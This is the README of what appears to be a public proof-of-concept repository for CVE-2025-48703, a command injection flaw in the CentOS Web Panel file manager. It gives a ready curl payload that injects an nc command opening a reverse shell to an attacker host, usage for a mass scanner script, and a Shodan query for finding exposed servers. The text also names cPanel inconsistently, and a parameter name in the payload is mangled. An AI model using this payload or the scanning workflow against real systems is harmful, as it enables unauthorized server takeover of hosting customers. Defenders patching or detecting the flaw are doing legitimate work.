Remote Code execution in CentOS web panel # 🛡️ CVE-2025-48703 - Remote Code Execution (RCE) in cPanel File Manager
## 📌 Description
**CVE-2025-48703** is a Remote Code Execution (RCE) vulnerability in the `filemanager` module of a web hosting control panel (e.g., cPanel). It occurs due to **unsanitized input handling** in the `acc=changePerm` function, which allows an attacker to inject and execute arbitrary system commands using the `t_total` parameter.
---
## 🧨 Impact
This vulnerability allows attackers to:
- Execute arbitrary commands on the target server.
- Establish a reverse shell for persistent access.
- Potentially escalate privileges or move laterally.
> ⚠️ This attack can be performed with minimal authentication, or in some configurations, unauthenticated access.
---
## 🚀 Proof-of-Concept (PoC)
### ✅ Reverse Shell Command
```bash
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
```
## Scanner usage
```bash
python3 Scanner.py #Make sure targets.txt is in the same dir
```
## Shodan search
```text
Server: cwpsrv
```
Reference: https://fenrisk.com/rce-centos-webpanel
[4.0K] /data/pocs/60b5b1b3ee205f0791e4c4a4dfa70c6f720296ba
├── [1.2K] README.md
├── [1.4K] Scanner.py
└── [ 0] target.txt
0 directories, 3 files